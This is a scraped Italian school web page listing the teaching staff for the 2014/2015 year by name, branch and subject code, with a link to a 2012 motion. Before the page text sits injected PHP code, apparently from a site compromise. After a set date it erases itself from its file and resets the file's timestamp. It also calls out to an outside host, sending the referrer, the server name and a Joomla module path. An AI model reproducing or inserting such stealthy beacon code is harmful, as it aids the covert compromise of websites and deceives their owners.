check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735873){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Collegio dei Docenti
Get Adobe Flash player

Nuovo sito

nuovosito 1

Collegio dei Docenti

Anno Scolastico 2014/2015

 

COGNOME

NOME

IND

Catt

ACETO

Gabriella

RM1

A061

AGOSTINO

Giovanna

RM1

SOS.

ALVIANO

Vincenzo

RM1

D601

AMATO

Paola

ART

SOS.

APPUGLIESE

Marco

ART

A049

ARCIDIACONO

Micaela

SCI

A346

ARE

Angela Maria

RM1

A049

ASCANIO

Lorenza

RM1

A021

ASDRUBALI

Maria Paola

ART

A021

BADALAMENTI

Vanda

SCI

A025

BARTOLONE

Francesca

ART

A061

BARTOLUCCI

Claudio

RM1

A010

BECKER

Ulrike

RM1

A346

BILLI

Alessio

ART

A050

BINI

Aminta

ART

A050

BISEGNA

Tiziana

RM1

A007

BODO

Paola

ART

SOS.

BOZZITELLI

Enrica

RM1

D613

BUCCITTI

Rita

ART

A022

CALABRO'

Andrea Fortunato

ART

A018

CASSIANI

Maria Alessandra

RM1

A061

CASTRICONE

Raffaello

RM1

A061

CAVAGNA

Manuela

ART

A346

CECE

Maria Gioia

ART

A049

CECERE

Juri

ART

SOS.

CELESTI

Marina

ART

A050

CERULLI

Anna

RM1

SOS.

CHIODO

Giuseppina

RM1

SOS.

CHIMENTI

Elizabeth

RM1

A049

CIAMMARUCONI

Maria Teresa

SCI

A051

CIRILLI

Vincenzo

ART

A013

CITO

Roberta

RM1

A037

CITTADINO

Rita

ART

SOS.

COLUZZI

Luca

SCI

A049

CORRARELLO

Maria Grazia

RM1

A345

COIS

Silvia

ART

A018

COSENZA

Carla

ART

A049

COSPITO

Antonietta

ART

A050

COSTANZA

Elvira

ART

A345

CUCCA

Maddalena Grazia

RM1

A010

D'AMORE

Davide

ART

A021

DE BENEDICTIS

Fiorella

ART

A029

DE BERNARDIS

Flavio

RM1

A050

DELL’ORSO

Aldo

SCI

A029

DE MEO

Claudio

ART

A018

DE PALMA

Michele

ART

SOS.

DE PETRA

Fausto Tiziano

RM1

A050

DI MARCO

Ada

ART

A018

DI RUSSO

Claudio

SCI

A060

FABRIZI

Stefania

RM1

A021

FERRARI

Bruno

RM1

D616

FERRERO

Mercurio

RM1

D602

FERRI

Rosa

ART

A346

GALLICO

Sonia

ART

A061

GALLOZZI

Maria

ART

A018

GIACCHETTA

Carla

RM1

A022

GIORNO FELICE

Francesca

RM1

A346

GIULIANO

Silvia

ART

IRC

GOLEMME

Achille

RM1

A018

GRAZIANO

Antonietta

RM1

A021

GRISOLIA

Raul Giuseppe

ART

A050

IACOVONI

Paola

RM1

A049

IORIO

Sonia

RM1

A049

IZZO

Antonietta

ART

A060

LACARIA

Consolata

RM1

SOS.

LACONCA

Raffaella

SCI

SOS.

LEONARDI

Paola

RM1

SOS.

LEONE

Francesco

RM1

A010

LEONE

Maria

ART

IRC

LOMBARDI

Roberto

RM1

A007

LO ZOPPO

Giorgio

ART

A049

LOTITO

Adele

ART

A021

LOZITO

Anna Rita

RM1

SOS.

MALASPINA

Rosanna

ART

A061

MARTUCCI

Domenico

RM1

SOS.

MASSIDDA

Maria

ART

SOS.

MELE

Marcello

RM1

A018

MELONI

Giovanni

RM1

D601

MINOZZI

Camillo

RM1

SOS.

MOFFA

Maria Pompea

RM1

IRC

MOLINA

Iris

ART

A037

MONTESANO

Raffaella

SCI

A051

MORI

Ilaria

ART

A050

MORSELLO

Gianclaudio

RM1

A029

NITTI

Stefania Manuela

RM1

SOS.

ORFEI

Maria Maddalena

ART

A050

PADULA

Anna

RM1

A013

PANELLA

Felice

ART

A022

PANTANETTI

Valentina

ART

SOS.

PAPA

Roberta

ART

A018

PARIS

Filippo

RM1

A018

PARIS

Marina

ART

A021

PASTA

Fabrizia

RM1

A029

PEDUZZI

Carla

ART

A346

PETRONI

Laura

ART

A018

PETRUCCI

Fabio

ART

A029

PIATTELLI

Maria Teresa

ART

A061

PROIETTI

Manlio

RM1

A029

PROPERZI

Virginia

RM1

A050

RAGONESI

Teresa

ART

A021

RACCA

Stefania

ART

A061

RATINI

Mario

SCI

A049

RAUCCI

Sebastiano

RM1

SOS.

ROMANINI

Gianluca

RM1

D610

RUSSANO

Daniela

ART

A029

RUSSO

Aurora

RM1

A061

RUSSO

Gianfranco

RM1

A050

SALA

Antonio

SCI

SOS.

SANTINELLI

Stefania

ART

A050

SARRA

Patrizia

ART

A049

SCAGLIOLA

Laura

RM1

A050

SCHIAVELLO

Rosina

SCI

A037

SERVODIO

Rosa

RM1

SOS.

SFORZA

Donata

ART

SOS.

SIMONE

Noemi

ART

SOS.

SORDINI

Ester

ART

A022

STEFANI

Claudia

RM1

A060

TILLI

Marina

RM1

SOS.

TOMS

Veronica

RM1

A021

TRILLO’

Maria Grazia

ART

A018

TULLI

Francesca

ART

A022

VALBRUZZI

Maria

ART

SOS.

VANO TACCARELLI

Rita

ART

A037

VARONE

Giuseppe

ART

A050

VENTURI

Carlo

RM1

D611

VIVANDI

Paolo

ART

A018

ZABATTA

Francesca

ART

A049

ZERI

Anna

RM1

A050

ZUCCHI

Chiara

ART

A050

 

 

 

Allegati:
FileDescrizioneDimensione del File
Scarica questo file (MOZIONE__COLLEGIO__DOCENTI[1].pdf)MOZIONE COLLEGIO DEI DOCENTIseduta del 30/10/2012114 Kb